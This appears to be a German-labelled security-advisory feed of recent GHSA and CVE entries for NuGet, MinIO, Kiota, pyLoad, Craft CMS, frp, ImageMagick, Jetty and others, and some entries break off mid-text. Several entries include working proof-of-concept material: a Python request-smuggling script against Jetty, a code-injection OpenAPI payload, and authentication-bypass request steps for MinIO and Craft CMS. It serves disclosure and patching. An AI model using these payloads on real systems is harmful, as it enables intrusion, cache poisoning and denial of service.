| Risiko / Label | Veröffentlichung | |
|---|---|---|
| Risiko 2 / 10 GHSA-g4vj-cjjj-v7hg | vor 1 Stunde(n) | |
| ### Impact This update adds validation of the package ID and version during package download, in addition to the existing package signature validation. ### Patches #### NuGet The following NuGet.exe, NuGet.CommandLine, NuGet.Packaging, and NuGet.Protocol versions have been patched: |Affected versions|Patched version| |--|--| |>= 4.9.0, <= 4.9.6|4.9.7| |>= 5.11.0, <= 5.11.6|5.11.7| |>= 6.8.0, <= 6.8.1|6.8.2| |>= 6.11.0, <= 6.11.1|6.11.2| |>= 6.12.0, <= 6.12.4|6.12.5| |>= 6.14.0, <= 6.14.2|6.14.3| |>= 7.0.0, <= 7.0.2|7.0.3| |7.3.0|7.3.1| #### .NET SDK * .NET 8.0.126 SDK * .NET 8.0.420 SDK * .NET 9.0.116 SDK * .NET 9.0.313 SDK * .NET 10.0.106 SDK * .NET 10.0.202 SDK ### Workarounds N/A ### References https://github.com/NuGet/NuGetGallery/security/advisories/GHSA-9r3h-v4hx-rhfr ### Credit [splitline](https://x.com/_splitline_) with [DEVCORE](https://devco.re/) | ||
| Risiko 7.5 / 10 GHSA-2x79-gwq3-vxxm | vor 1 Stunde(n) | |
| ### Summary
`fio_json_parse` can enter an infinite loop when it encounters a nested JSON value starting with `i` or `I`. The process spins in user space and pegs one CPU core at ~100% instead of returning a parse error. Because `iodine` vendors the same parser code, the issue also affects `iodine` when it parses attacker-controlled JSON.
The smallest reproducer found is `[i`. The quoted-value form that originally exposed the issue, `[""i`, reaches the same bug because the parser tolerates missing commas and then treats the trailing `i` as the start of another value.
### Details
The vulnerable logic is in `lib/facil/fiobj/fio_json_parser.h` around the numeral handling block (`0.7.5` / `0.7.6`: lines `434-468`; `master`: lines `434-468` in the current tree as tested).
This parser is reached from real library entry points, not just the header in isolation:
- `facil.io`: `lib/facil/fiobj/fiobj_json.c:377-387` (`fiobj_json2obj`) and `402-411` (`fiobj_hash_update_json`)
- `iodine`: `ext/iodine/iodine_json.c:161-177` (`iodine_json_convert`)
- `iodine`: `ext/iodine/fiobj_json.c:377-387` and `402-411`
Relevant flow:
1. Inside an array or object, the parser sees `i` or `I` and jumps to the `numeral:` label.
2. It calls `fio_atol((char **)&tmp)`.
3. For a bare `i` / `I`, `fio_atol` consumes zero characters and leaves `tmp == pos`.
4. The current code only falls back to float parsing when `JSON_NUMERAL[*tmp]` is true.
5. `JSON_NUMERAL['i'] == 0`, so the parser incorrectly accepts the value as an integer and sets `pos = tmp` without advancing.
6. Because parsing is still nested (`parser->depth > 0`), the outer loop continues forever with the same `pos`.
The same logic exists in `iodine`'s vendored copy at `ext/iodine/fio_json_parser.h` lines `434-468`.
Why the `[""i` form hangs:
1. The parser accepts the empty string `""` as the first array element.
2. It does not require a comma before the next token.
3. The trailing `i` is then parsed as a new nested value.
4. The zero-progress numeral path above causes the infinite loop.
Examples that trigger the bug:
- Array form, minimal: `[i`
- Object form: `{"a":i`
- After a quoted value in an array: `[""i`
- After a quoted value in an object: `{"a":""i`
## PoC
Environment used for verification:
- `facil.io` commit: `162df84001d66789efa883eebb0567426d00148e`
- `iodine` commit: `5bebba698d69023cf47829afe51052f8caa6c7f8`
- standalone compile against `fio_json_parser.h`
### Minimal standalone program
Use the normal HTTP stack. The following server calls `http_parse_body(h)`, which reaches `fiobj_json2obj` and then `fio_json_parse` for `Content-Type: application/json`.
```c
#define _POSIX_C_SOURCE 200809L
#include |
||
| Risiko 7.5 / 10 GHSA-hv4r-mvr4-25vw | vor 1 Stunde(n) | |
| ### Impact _What kind of vulnerability is it? Who is impacted?_ An authentication bypass vulnerability in MinIO's `STREAMING-UNSIGNED-PAYLOAD-TRAILER` code path allows any user who knows a valid access key to write arbitrary objects to any bucket without knowing the secret key or providing a valid cryptographic signature. Any MinIO deployment is impacted. The attack requires only a valid access key (the well-known default `minioadmin`, or any key with WRITE permission on a bucket) and a target bucket name. `PutObjectHandler` and `PutObjectPartHandler` call `newUnsignedV4ChunkedReader` with a signature verification gate based solely on the presence of the `Authorization` header: ```go newUnsignedV4ChunkedReader(r, true, r.Header.Get(xhttp.Authorization) != "") ``` Meanwhile, `isPutActionAllowed` extracts credentials from either the `Authorization` header or the `X-Amz-Credential` query parameter, and trusts whichever it finds. An attacker omits the `Authorization` header and supplies credentials exclusively via the query string. The signature gate evaluates to `false`, `doesSignatureMatch` is never called, and the request proceeds with the permissions of the impersonated access key. This affects `PutObjectHandler` (standard and tables/warehouse bucket paths) and `PutObjectPartHandler` (multipart uploads). **Affected components:** `cmd/object-handlers.go` (`PutObjectHandler`), `cmd/object-multipart-handlers.go` (`PutObjectPartHandler`). ### Affected Versions All MinIO releases through the final release of the minio/minio open-source project. The vulnerability was introduced in commit [`76913a9fd`](https://github.com/minio/minio/commit/76913a9fd5c6e5c2dbd4e8c7faf56ed9e9e24091) ("Signed trailers for signature v4", [PR #16484](https://github.com/minio/minio/pull/16484)), which added `authTypeStreamingUnsignedTrailer` support. The first affected release is `RELEASE.2023-05-18T00-05-36Z`. ### Patches **Fixed in**: MinIO AIStor RELEASE.2026-04-11T03-20-12Z #### Binary Downloads | Platform | Architecture | Download | | -------- | ------------ | --------------------------------------------------------------------------- | | Linux | amd64 | [minio](https://dl.min.io/aistor/minio/release/linux-amd64/minio) | | Linux | arm64 | [minio](https://dl.min.io/aistor/minio/release/linux-arm64/minio) | | macOS | arm64 | [minio](https://dl.min.io/aistor/minio/release/darwin-arm64/minio) | | macOS | amd64 | [minio](https://dl.min.io/aistor/minio/release/darwin-amd64/minio) | | Windows | amd64 | [minio.exe](https://dl.min.io/aistor/minio/release/windows-amd64/minio.exe) | #### FIPS Binaries | Platform | Architecture | Download | | -------- | ------------ | --------------------------------------------------------------------------- | | Linux | amd64 | [minio.fips](https://dl.min.io/aistor/minio/release/linux-amd64/minio.fips) | | Linux | arm64 | [minio.fips](https://dl.min.io/aistor/minio/release/linux-arm64/minio.fips) | #### Package Downloads | Format | Architecture | Download | | ------ | ------------ | ----------------------------------------------------------------------------------------------------------------------------------- | | DEB | amd64 | [minio_20260411032012.0.0_amd64.deb](https://dl.min.io/aistor/minio/release/linux-amd64/minio_20260411032012.0.0_amd64.deb) | | DEB | arm64 | [minio_20260411032012.0.0_arm64.deb](https://dl.min.io/aistor/minio/release/linux-arm64/minio_20260411032012.0.0_arm64.deb) | | RPM | amd64 | [minio-20260411032012.0.0-1.x86_64.rpm](https://dl.min.io/aistor/minio/release/linux-amd64/minio-20260411032012.0.0-1.x86_64.rpm) | | RPM | arm64 | [minio-20260411032012.0.0-1.aarch64.rpm](https://dl.min.io/aistor/minio/release/linux-arm64/minio-20260411032012.0.0-1.aarch64.rpm) | #### Container Images ```bash # Standard docker pull quay.io/minio/aistor/minio:RELEASE.2026-04-11T03-20-12Z podman pull quay.io/minio/aistor/minio:RELEASE.2026-04-11T03-20-12Z # FIPS docker pull quay.io/minio/aistor/minio:RELEASE.2026-04-11T03-20-12Z.fips podman pull quay.io/minio/aistor/minio:RELEASE.2026-04-11T03-20-12Z.fips ``` #### Homebrew (macOS) ```bash brew install minio/aistor/minio ``` ### Workarounds - [Users of the open-source `minio/minio` project should upgrade to MinIO AIStor `RELEASE.2026-04-11T03-20-12Z` or later.](https://docs.min.io/enterprise/aistor-object-store/upgrade-aistor-server/community-edition/) If upgrading is not immediately possible: - **Block unsigned-trailer requests at the load balancer.** Reject any request containing `X-Amz-Content-Sha256: STREAMING-UNSIGNED-PAYLOAD-TRAILER` at the reverse proxy or WAF layer. Clients can use `STREAMING-AWS4-HMAC-SHA256-PAYLOAD-TRAILER` (the signed variant) instead. - **Restrict WRITE permissions.** Limit `s3:PutObject` grants to trusted principals. While this reduces the attack surface, it does not eliminate the vulnerability since any user with WRITE permission can exploit it with only their access key. ### Credits - **Finder:** Arvin Shivram of Brutecat Security ([@ddd](https://github.com/ddd)) | ||
| Risiko 7.5 / 10 GHSA-2hx3-vp6r-mg3f | vor 1 Stunde(n) | |
| # Code Generation Literal Injection in Kiota ## Summary Kiota versions **prior to 1.31.1** are affected by a code-generation literal injection vulnerability in multiple writer sinks (for example: serialization/deserialization keys, path/query parameter mappings, URL template metadata, enum/property metadata, and default value emission). When malicious values from an OpenAPI description are emitted into generated source without context-appropriate escaping, an attacker can break out of string literals and inject additional code into generated clients. ## Impact and Preconditions This issue is only practically exploitable when: 1. the OpenAPI description used for generation is from an **untrusted source**, or 2. a normally trusted OpenAPI description has been **compromised/tampered with**. If you only generate from trusted, integrity-protected API descriptions, risk is significantly reduced. ## Affected Versions - **Affected:** all versions **< 1.31.1** - **Fixed:** **1.31.1** and later ## Illustrative Exploit Example ### Example OpenAPI fragment (malicious default value) ```yaml openapi: 3.0.1 info: title: Exploit Demo version: 1.0.0 components: schemas: User: type: object properties: displayName: type: string default: "\"; throw new System.Exception(\"injected\"); //" ``` ### Example generated C# snippet before fix (illustrative) ```csharp public User() { DisplayName = ""; throw new System.Exception("injected"); //"; } ``` The injected payload escapes the intended string context and introduces attacker-controlled statements in generated code. > Note: this exploit is not limited to default values, but may also impact properties names (serialization), path or query parameters, enum representations and other locations. ## Remediation 1. Upgrade Kiota to **1.31.1 or later**. 2. Regenerate/refresh existing generated clients as a precaution: ```bash kiota update ``` Refreshing generated clients ensures previously generated vulnerable code is replaced with hardened output. ## Acknowledgement We would like to thank the researcher Thanatos Tian (Polyu) for finding this issue and for his contribution to this open source project. | ||
| Risiko 2 / 10 GHSA-fj52-5g4h-gmq8 | vor 1 Stunde(n) | |
| ### Summary The `pyload` application does not properly invalidate or modify sessions upon changes made to a user's permissions. ### Details Whenever an administrator changes the permissions a specific account has, they do not expect that account still being able to access data that their new permissions do not allow. This is not the case for the `pyload` application, as a user with a valid session can still perform the actions. ### PoC Take a user with all the permissions, as shown below.  We now log in as this user.  Let us now take away all the permissions.  The logged in session can still be used to access everything in the application.  ### Impact Should permissions be taken away, then the user is expected not to be able to execute the actions belonging to those actions anymore. | ||
| Risiko 7.5 / 10 GHSA-66hx-chf7-3332 | vor 1 Stunde(n) | |
| ### Summary pyLoad caches `role` and `permission` in the session at login and continues to authorize requests using these cached values, even after an admin changes the user's role/permissions in the database. As a result, an already logged-in user can keep old (revoked) privileges until logout/session expiry, enabling continued privileged actions. This is a core authorization/session-consistency issue and is not resolved by toggling an optional security feature. ### Details The WebUI auth flow stores authorization state in session: - `src/pyload/webui/app/helpers.py:187-200` - `set_session(...)` writes: - `"role": user_info["role"]` - `"perms": user_info["permission"]` Authorization checks later trust cached session values: - `src/pyload/webui/app/helpers.py:134-151` - `parse_permissions(...)` reads `session.get("role")` / `session.get("perms")` - `src/pyload/webui/app/helpers.py:225-230` - `is_authenticated(...)` only verifies `authenticated` and `api.user_exists(user)` (existence), not fresh role/permission - `src/pyload/webui/app/helpers.py:267-275` - `login_required(...)` uses `parse_permissions(s)` for allow/deny decisions - `src/pyload/webui/app/helpers.py:356-365` - API session auth path also trusts `s["role"]` and `s["perms"]` Role/permission updates are written to DB but active sessions are not invalidated/refreshed: - `src/pyload/webui/app/blueprints/json_blueprint.py:389-434` - `update_users(...)` calls `api.set_user_permission(...)` and returns - `src/pyload/core/api/__init__.py:1643-1645` - `set_user_permission(...)` updates DB role/permission only Default exposure window is long: - `src/pyload/core/config/default.cfg:47` - `session_lifetime = 44640` minutes (~31 days) Therefore, privilege revocation is not enforced immediately for active sessions. Note on duplicates: - This appears distinct from CVE-2023-0227 (session validity after **user deletion**) because this report is about stale authorization after **role/permission changes** while the user still exists. ### PoC ```python #!/usr/bin/env python3 """ Repro: stale session privilege after role/permission changes. This PoC is source-based and leaves no persistent state. It validates that: 1) Role/permission are cached into session at login. 2) Authorization checks read role/permission from session, not fresh DB values. 3) User updates write DB permission/role without invalidating active sessions. 4) Default session lifetime is long, increasing stale-privilege exposure window. """ from __future__ import annotations import pathlib import re from typing import Iterable ROOT = pathlib.Path(__file__).resolve().parent / "pyload" / "src" / "pyload" def read(rel: str) -> str: return (ROOT / rel).read_text(encoding="utf-8") def has_any(text: str, patterns: Iterable[str]) -> bool: return all(re.search(p, text, re.MULTILINE) for p in patterns) def main() -> None: helpers = read("webui/app/helpers.py") json_blueprint = read("webui/app/blueprints/json_blueprint.py") api_init = read("core/api/__init__.py") default_cfg = (ROOT / "core/config/default.cfg").read_text(encoding="utf-8") checks = { "set_session_caches_role_perms": has_any( helpers, [ r'def\\s+set_session\\(', r'"role"\\s*:\\s*user_info\\["role"\\]', r'"perms"\\s*:\\s*user_info\\["permission"\\]', ], ), "is_authenticated_only_checks_user_exists": has_any( helpers, [ r'def\\s+is_authenticated\\(', r'api\\s*=\\s*flask\\.current_app\\.config\\["PYLOAD_API"\\]', r'return\\s+authenticated\\s+and\\s+api\\.user_exists\\(user\\)', ], ), "parse_permissions_reads_session_cache": has_any( helpers, [ r'def\\s+parse_permissions\\(', r'session\\.get\\("role"\\)\\s*==\\s*Role\\.ADMIN', r'session\\.get\\("perms"\\)', ], ), "login_required_uses_parse_permissions_session": has_any( helpers, [ r'def\\s+login_required\\(', r'if\\s+is_authenticated\\(s\\):', r'perms\\s*=\\s*parse_permissions\\(s\\)', ], ), "api_session_auth_uses_cached_role_perms": has_any( helpers, [ r'if\\s+is_authenticated\\(s\\):', r'"role"\\s*:\\s*s\\["role"\\]', r'"permission"\\s*:\\s*s\\["perms"\\]', ], ), "update_users_changes_db_without_session_invalidation": has_any( json_blueprint, [ r'def\\s+update_users\\(', r'api\\.set_user_permission\\(name,\\s*data\\["permission"\\],\\s*data\\["role"\\]\\)', r'return\\s+jsonify\\(True\\)', ], ), "set_user_permission_only_updates_db": has_any( api_init, [ r'def\\s+set_user_permission\\(', r'self\\.pyload\\.db\\.set_permission\\(user,\\s*permission\\)', r'self\\.pyload\\.db\\.set_role\\(user,\\s*role\\)', ], ), "default_session_lifetime_long": re.search( r'session_lifetime\\s*:\\s*"Session lifetime \\(minutes\\)"\\s*=\\s*44640', default_cfg, re.MULTILINE, ) is not None, } for name, ok in checks.items(): print(f"{name}={ok}") stale_privilege_repro_success = all(checks.values()) print(f"stale_privilege_repro_success={stale_privilege_repro_success}") # Cleanup: this PoC creates/modifies no runtime/data files. print("cleanup_done=True") if __name__ == "__main__": main() ``` ```text set_session_caches_role_perms=True is_authenticated_only_checks_user_exists=True parse_permissions_reads_session_cache=True login_required_uses_parse_permissions_session=True api_session_auth_uses_cached_role_perms=True update_users_changes_db_without_session_invalidation=True set_user_permission_only_updates_db=True default_session_lifetime_long=True stale_privilege_repro_success=True cleanup_done=True ``` ### Impact - Privilege revocation is not immediate for active sessions. - A user can continue using stale, previously granted privileges (including admin) after downgrade/restriction. - This can allow continued access to privileged WebUI/API actions until session expiry or manual logout/session reset. | ||
| Risiko 5 / 10 GHSA-95wr-3f2v-v2wh | vor 1 Stunde(n) | |
| ### Summary The `resource-js` endpoint in Craft CMS allows unauthenticated requests to proxy remote JavaScript resources. When `trustedHosts` is not explicitly restricted (default configuration), the application trusts the client-supplied Host header. This allows an attacker to control the derived `baseUrl`, which is used in prefix validation inside `actionResourceJs()`. By supplying a malicious Host header, the attacker can make the server issue arbitrary HTTP requests, leading to Server-Side Request Forgery (SSRF). ### Details The vulnerability exists in `AppController::actionResourceJs()`. The function validates that the `url` parameter starts with `assetManager->baseUrl`. However, `baseUrl` is derived from the current request host. If `trustedHosts` is not configured, the Host header is fully attacker-controlled. Attack chain: 1. Attacker sends request with controlled `Host` header. 2. Application derives `baseUrl` from the malicious Host. 3. `url` parameter is required to start with this `baseUrl`. 4. Validation passes. 5. Guzzle performs a server-side HTTP request to the attacker-controlled host. 6. SSRF occurs. This does not rely on string parsing bypass. It relies on Host header trust. ### PoC (safe reproduction steps) Environment: - Craft CMS 5.9.12 - Default configuration (no trustedHosts restriction) - Docker deployment 1. Start a listener inside the container: python3 -m http.server 9999 2. Send a request to resource-js with a controlled Host header. 3. Observe that the internal listener receives a request (OOB confirmation). | ||
| Risiko 5 / 10 GHSA-3m9m-24vh-39wx | vor 1 Stunde(n) | |
| ## Required Permissions
The exploitation requires a few permissions to be enabled in the used GraphQL schema:
* "Edit assets in the |
||
| Risiko 5 / 10 GHSA-jq2f-59pj-p3m3 | vor 1 Stunde(n) | |
| ## Summary The `actionSavePermissions()` endpoint allows a user with only `viewUsers` permission to remove arbitrary users from all user groups. While `_saveUserGroups()` enforces per-group authorization for additions, it performs no equivalent authorization check for removals, so submitting an empty `groups` value removes all existing group memberships. ## Affected Versions - Craft CMS 5.6.0 through 5.9.14 (latest release at time of report) - Regression introduced in 5.6.0 when the `viewUsers` permission was added - Prior to 5.6.0, `editedUser()` required `editUsers`, which implicitly protected this endpoint - Requires Pro edition or higher (the vulnerable code path is gated by `CmsEdition::Pro`) ## Vulnerability Details ### Root Cause This is a **regression** introduced in Craft CMS 5.6.0 when the `viewUsers` permission was added. Before that change, `editedUser()` required `editUsers` permission for accessing other users’ data, which implicitly protected `actionSavePermissions()`. After the change, `actionSavePermissions()` became reachable for users with read-only access to other users, but the underlying group-saving logic still lacked authorization for group removals. The vulnerability has two components: 1. **`actionSavePermissions()` reachable with read-only access**: The action only requires a control panel request and delegates to `editedUser()`, which now only checks `viewUsers` — a permission explicitly documented as "read-only access to user elements." 2. **Asymmetric authorization in `_saveUserGroups()`**: The method checks `assignUserGroup` permission only when **adding** a user to a new group. When the `groups` parameter is an empty string (resulting in an empty array), the loop is skipped entirely, no authorization checks are run, and all group memberships are removed. ### Prerequisites - Attacker has a control panel account with `accessCp` and `viewUsers` permissions only - Target user belongs to one or more user groups that grant additional permissions - Pro edition or higher ### Attack Steps 1. Attacker authenticates to the Control Panel 2. Attacker sends a POST request to `actions/users/save-permissions` with: - `userId` = target user's ID - `groups` = `` (empty string) 3. All group memberships for the target user are removed 4. All permissions inherited from those groups are immediately revoked ### Impact - **Privilege revocation**: An attacker can strip group-based permissions from arbitrary users, including accounts whose effective access derives from group membership - **Denial of access**: Users lose access to sections, volumes, and features that were granted through group membership - **Bypass of elevated session requirement**: Group removal does not trigger `requireElevatedSession()` (which is only triggered when new groups are added) | ||
| Risiko 2 / 10 GHSA-hw5x-4r37-72w7 | vor 1 Stunde(n) | |
| ### Impact Unauthenticated denial of service. ### Summary When installing module packages from attacker-controlled sources, `tofu init` may use unbounded memory, cause high CPU usage, or deadlock when encountering maliciously-crafted TLS certificate chains or tar archives. Those who depend on modules or providers served from untrusted third-party servers may experience denial of service due to `tofu init` failing to complete successfully. In the case of unbounded memory usage or high CPU usage, other processes running on the same computer as OpenTofu may also fail or have their performance degraded due to the depletion of shared system resources. These vulnerabilities **do not** permit arbitrary code execution or allow disclosure of confidential information. ### Details OpenTofu relies on third-party implementations of TLS certificate verification and tar archive extraction from the standard library of the Go programming language. The Go project has recently published the following advisories for those implementations which indirectly affect OpenTofu's behavior: - [CVE-2026-32280](https://www.cve.org/CVERecord?id=CVE-2026-32280): Unexpected work during chain building in crypto/x509 - [CVE-2026-32281](https://www.cve.org/CVERecord?id=CVE-2026-32281): Inefficient policy validation in crypto/x509 - [CVE-2026-32283](https://www.cve.org/CVERecord?id=CVE-2026-32283): Unauthenticated TLS 1.3 KeyUpdate record can cause persistent connection retention and DoS in crypto/tls - [CVE-2026-32288](https://www.cve.org/CVERecord?id=CVE-2026-32288): Unbounded allocation for old GNU sparse in archive/tar OpenTofu's threat model considers module and package dependencies to be arbitrary third-party code that operators must carefully review after installation. However, these particular problems affect the process of _installing_ these dependencies with `tofu init`, and so can potentially occur before an operator has had the opportunity to review what is being installed. In particular, the TLS-related vulnerabilities can occur before OpenTofu actually retrieves a dependency package and performs checksum verification, because they affect the transport of the packages rather than the content of the packages. An attacker can exploit this either by controlling the TLS certificate chain used to authenticate the connection to the server where the dependencies are hosted, or (in the case of module packages only) by controlling the content of a package served when OpenTofu is expecting to receive a package using the "tar" archive format with or without compression. However, the attacker must also coerce an OpenTofu operator into attempting dependency installation from the server they control. Typical use of OpenTofu already requires caution in selection of third-party dependencies because they are arbitrary code, and so the vulnerability here is only in the addition of a potential denial of service in the `tofu init` process, which does not execute third-party dependency code itself. ### Patches OpenTofu v1.11.6 addresses these vulnerabilities by being built against Go 1.25.9, which contains improved versions of the upstream implementations. The OpenTofu v1.10 and v1.9 series are also impacted by these vulnerabilities. However, those series are built with a version of Go for which no upstream fix is available. Adopting Go 1.25.9 for those series would effectively end support for certain versions of macOS, and the OpenTofu Project has determined that the impact of these vulnerabilities is not high enough to justify that disruption in a patch release. For those using the OpenTofu v1.10 or v1.9 releases we recommend planning to upgrade to OpenTofu v1.11.6 in the near future, and reviewing the Workarounds section below in the meantime. ### Workarounds These vulnerabilities can be exploited only if an attacker can coerce an operator to add a dependency from an attacker-controlled source to their configuration before running `tofu init`. Those who are unable to upgrade can therefore minimize risk by reviewing new dependencies _before_ adding them to the configuration, such as by directly fetching the relevant artifacts using software other than OpenTofu. Successful exploitation requires that the attacker control either an HTTPS server that `tofu init` would contact during dependency installation or a tar archive that OpenTofu would fetch and extract during the module installation process. Note that OpenTofu modules can have their own dependencies on other modules, so an attacker could potentially use a module served from a source such as GitHub or the OpenTofu Registry to indirectly request a module from a server they control. | ||
| Risiko 2 / 10 GHSA-fcpv-w245-r2q7 | vor 1 Stunde(n) | |
| The codebase raises code analysis warnings related to security, including CA3075, CA5366, CA5371, CA5368, CA5369, CA5372, CA5379, CA5350, and CA5351. Most of these deal with disabling DTD processing in XML documents, but also includes cryptographic algorithm choices. | ||
| Risiko 5 / 10 GHSA-pq96-pwvg-vrr9 | vor 1 Stunde(n) | |
| ### Summary
frp contains an authentication bypass in the HTTP vhost routing path when `routeByHTTPUser` is used as part of access control. In proxy-style requests, the routing logic uses the username from `Proxy-Authorization` to select the `routeByHTTPUser` backend, while the access control check uses credentials from the regular `Authorization` header. As a result, an attacker who can reach the HTTP vhost entrypoint and knows or can guess the protected `routeByHTTPUser` value may access a backend protected by `httpUser` / `httpPassword` even with an incorrect `Proxy-Authorization` password.
This issue affects deployments that explicitly use `routeByHTTPUser`. It does not affect ordinary HTTP proxies that do not use this feature.
### Details
The issue is in `pkg/util/vhost/http.go`.
In proxy-style requests using an absolute URI, the routing path extracts the username from `Proxy-Authorization` and stores it as the request `HTTPUser`, which is then used for `routeByHTTPUser` route selection.
More specifically, `injectRequestInfoToCtx()` derives the routing user from `Proxy-Authorization`, while the original `ServeHTTP()` implementation used `req.BasicAuth()` for the authentication check.
Because routing and authentication use different credential sources, a request can be routed to a protected backend based on the `Proxy-Authorization` username while the authentication check is not performed against the same credentials. This creates an authentication bypass when `routeByHTTPUser`, `httpUser`, and `httpPassword` are used together.
This is not a universal anonymous bypass for all frp HTTP proxies; it is specific to deployments that use `routeByHTTPUser` and where the target user value is known or can be inferred.
A minimal fix is to make the authentication check in proxy mode use the same credential source as route selection, i.e. to derive proxy-mode credentials from `Proxy-Authorization` consistently.
From local Git history analysis, this logic appears to have been introduced by commit `4af85da0c2c6eb981142a8fdb44f885d26cb9d08`, with the earliest containing release tag appearing to be `v0.43.0`.
### PoC
I reproduced the issue with the official `frp_0.68.0_linux_amd64.tar.gz` release binaries both locally and on an internet-reachable test server under my control.
Minimal setup:
- `frps` exposes an HTTP vhost entrypoint.
- One HTTP proxy is configured with:
- `customDomains = ["example.test"]`
- `routeByHTTPUser = "alice"`
- `httpUser = "alice"`
- `httpPassword = "secret"`
- The protected backend returns a constant marker string: `PRIVATE`.
Minimal request flow:
1. Direct unauthenticated request:
- `curl -i --proxy '' -H 'Host: example.test' http:// |
||
| Risiko 2 / 10 GHSA-x928-4434-crqj | vor 1 Stunde(n) | |
| When the PNG encoder fails to write an MNG image it can leak memory. | ||
| Risiko 2 / 10 GHSA-pmpg-6pww-fg6q | vor 1 Stunde(n) | |
| When the `connected-components:*` define specifies an invalid index and out of bound operation will result in an access violation. | ||
| Risiko 2 / 10 GHSA-8vfj-q2cp-5m5j | vor 1 Stunde(n) | |
| An unrecognized magnify:method will result in an out of bounds read in the magnify operation. ``` ==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a000000b30 READ of size 4 at 0x61a000000b30 thread T0 ``` | ||
| Risiko 5 / 10 GHSA-98cp-rj9f-6v5g | vor 1 Stunde(n) | |
| The patch for GHSA-7h7q-j33q-hvpf was incomplete and still allows a stack buffer overflow for the multi frame images. | ||
| Risiko 2 / 10 GHSA-q8h3-jv9v-57qx | vor 1 Stunde(n) | |
| An incorrect morphology would allow an out of bounds read of a single pixel. ``` ==1200284==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5100000002d0 at pc 0x59e28e60c27a bp 0x7fff047fd8e0 sp 0x7fff047fd8d0 READ of size 4 at 0x5100000002d0 thread T0 ``` | ||
| Risiko 2 / 10 GHSA-w54j-7wpm-crhj | vor 1 Stunde(n) | |
| The FTXT encoder lacks a boundary check when parsing `ftxt:format`, resulting in an out of bounds read. ``` ==3040863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5020000085b2 at pc 0x606c1ee0c6ce bp 0x7ffee30d6150 sp 0x7ffee30d6148 READ of size 1 at 0x5020000085b2 thread T0 ``` | ||
| Risiko 7.5 / 10 CVE-2026-2332 | vor 12 Stunde(n) | |
| ### Description (as reported) Jetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. ### Background This vulnerability is a new variant discovered while researching the "Funky Chunks" HTTP request smuggling techniques: - https://w4ke.info/2025/06/18/funky-chunks.html - https://w4ke.info/2025/10/29/funky-chunks-2.html The original research tested various chunk extension parsing differentials but did not test quoted-string handling within extension values. ### Technical Details **RFC 9112 Section 7.1.1** defines chunked transfer encoding: ``` chunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) chunk-ext-val = token / quoted-string ``` **RFC 9110 Section 5.6.4** defines quoted-string: ``` quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE ``` A quoted-string continues until the closing DQUOTE, and `\r\n` sequences are not permitted within the quotes. ### Vulnerability Jetty terminates chunk header parsing at `\r\n` inside quoted strings instead of treating this as an error. **Expected (RFC compliant):** ``` Chunk: 1;a="value\r\nhere"\r\n ^^^^^^^^^^^^^^^^^^ extension value Body: [1 byte after the real \r\n] ``` **Actual (jetty):** ``` Chunk: 1;a="value ^^^^^ terminates here (WRONG) Body: here"... treated as body/next request ``` ### Proof of Concept ```python #!/usr/bin/env python3 import socket payload = ( b"POST / HTTP/1.1\r\n" b"Host: localhost\r\n" b"Transfer-Encoding: chunked\r\n" b"\r\n" b'1;a="\r\n' b"X\r\n" b"0\r\n" b"\r\n" b"GET /smuggled HTTP/1.1\r\n" b"Host: localhost\r\n" b"Content-Length: 11\r\n" b"\r\n" b'"\r\n' b"Y\r\n" b"0\r\n" b"\r\n" ) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(3) sock.connect(("127.0.0.1", 8080)) sock.sendall(payload) response = b"" while True: try: chunk = sock.recv(4096) if not chunk: break response += chunk except socket.timeout: break sock.close() print(f"Responses: {response.count(b'HTTP/')}") print(response.decode(errors="replace")) ``` **Result:** Server returns 2 HTTP responses from a single TCP connection. #### Parsing Breakdown | Parser | Request 1 | Request 2 | |--------|-----------|-----------| | jetty (vulnerable) | POST / body="X" | GET /smuggled (SMUGGLED!) | | RFC compliant | POST / body="Y" | (none - smuggled request hidden in extension) | ### Impact - **Request Smuggling**: Attacker injects arbitrary HTTP requests - **Cache Poisoning**: Smuggled responses poison shared caches - **Access Control Bypass**: Smuggled requests bypass frontend security - **Session Hijacking**: Smuggled requests can steal other users' responses ### Reproduction 1. Start the minimal POC with docker 2. Run the poc script provided in same zip ### Suggested Fix Ensure the chunk framing and extensions are parsed exactly as specified in RFC9112. A CRLF inside a quoted-string should be considered a parsing error and not a line terminator. ### Patches No patches yet. ### Workarounds No workarounds yet. | ||
| Risiko 5 / 10 CVE-2026-33929 | vor 15 Stunde(n) | |
| Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache PDFBox Examples. This issue affects the ExtractEmbeddedFiles example in Apache PDFBox: from 2.0.24 through 2.0.36, from 3.0.0 through 3.0.7. Users are recommended to update to version 2.0.37 or 3.0.8 once available. Until then, they should apply the fix provided in GitHub PR 427. The ExtractEmbeddedFiles example contained a path traversal vulnerability (CWE-22) mentioned in CVE-2026-23907. However the change in the releases 2.0.36 and 3.0.7 is flawed because it doesn't consider the file path separator. Because of that, a user having writing rights on /home/ABC could be victim to a malicious PDF resulting in a write attempt to any path starting with /home/ABC, e.g. "/home/ABCDEF". Users who have copied this example into their production code should apply the mentioned change. The example has been changed accordingly and is available in the project repository. | ||
| Risiko 2 / 10 CVE-2026-6216 | vor 1 Tag(en) | |
| A security vulnerability has been detected in DbGate up to 7.1.4. This affects an unknown function of the file packages/web/src/icons/FontIcon.svelte of the component SVG Icon String Handler. Such manipulation of the argument applicationIcon leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 7.1.5 mitigates this issue. It is advisable to upgrade the affected component. | ||
| Risiko 9.5 / 10 CVE-2026-5059 | vor 3 Tag(en) | |
| aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the allowed commands list. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the MCP server. Was ZDI-CAN-27969. | ||
| Risiko 9.5 / 10 CVE-2022-0239 | vor 1548 Tag(en) | |
| corenlp is vulnerable to Improper Restriction of XML External Entity Reference | ||
